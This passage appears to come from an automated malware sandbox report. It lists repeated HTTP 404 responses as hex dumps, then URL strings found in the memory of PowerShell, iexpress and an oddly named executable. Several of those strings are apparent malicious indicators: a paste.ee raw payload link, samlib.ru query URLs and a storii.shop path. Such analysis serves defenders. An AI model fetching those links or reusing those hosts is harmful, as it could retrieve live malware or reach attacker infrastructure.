                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 15 Apr 2025 15:05:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 15 Apr 2025 15:05:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 15 Apr 2025 15:05:32 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:05:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:05:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:05:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:05:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PASTE.EE/R/49ZDOXRT/0
                  Source: svchost.exe, 0000000D.00000002.2234977616.0000017B07000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: qmgr.db.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: powershell.exe, 00000007.00000002.1170496094.0000023510073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501B0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D91985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023501A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                  Source: powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9192A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000057A4000.00000004.10000000.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.0000000003664000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EE74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://samlib.ru/x6zj/?8ro=uF08wju0cXQ&3h5hA=pkzXSxPTT2YrTAYwTOcaicIRCimt47DVGFikR34exbY7UM7MJB5O
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000057A4000.00000004.10000000.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.0000000003664000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EE74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://samlib.ru/x6zj/?8ro=uF08wju0cXQ&amp;3h5hA=pkzXSxPTT2YrTAYwTOcaicIRCimt47DVGFikR34exbY7UM7MJB5
                  Source: powershell.exe, 00000005.00000002.1197339575.000001C9951C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D91593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9192A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000007.00000002.1183487116.000002357C566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                  Source: DmMVOWsP1JSI77P.exe, 00000014.00000002.2232234775.0000000005746000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.storii.shop
                  Source: DmMVOWsP1JSI77P.exe, 00000014.00000002.2232234775.0000000005746000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.storii.shop/4dea/
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 00000005.00000002.1197339575.000001C99519A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1197339575.000001C99517D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
